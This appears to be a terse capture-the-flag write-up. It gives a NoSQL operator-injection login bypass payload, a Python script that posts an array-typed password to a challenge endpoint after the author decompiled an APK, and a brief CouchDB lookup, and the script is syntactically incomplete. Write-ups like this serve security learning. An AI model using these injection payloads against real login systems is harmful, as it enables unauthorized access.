this was an easy NoSQL injection:[$ne]=1&password[$ne]=1


the task gave us an APK. After decompiled it the java code basically checks for an hard-coded password that was ‘passwd’. Then the application do a POST request to /update.php with parameters pwd, imei and div that return an error message. To get the flag just submit pwd as an array:

import requests
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19',
payload = {'pwd[]': 'paswd', 'imei': '123','div':'321'}
r = requests.post("http://challenges.defconkerala.com/web/300/update.php", data=payload,headers=headers)
print r.text


couchdb was used for this challenge. We first take a look at the recent modifications to the db:

we saw a table there named ‘flag_for_l33ts’. Just put it in search field and get the flag: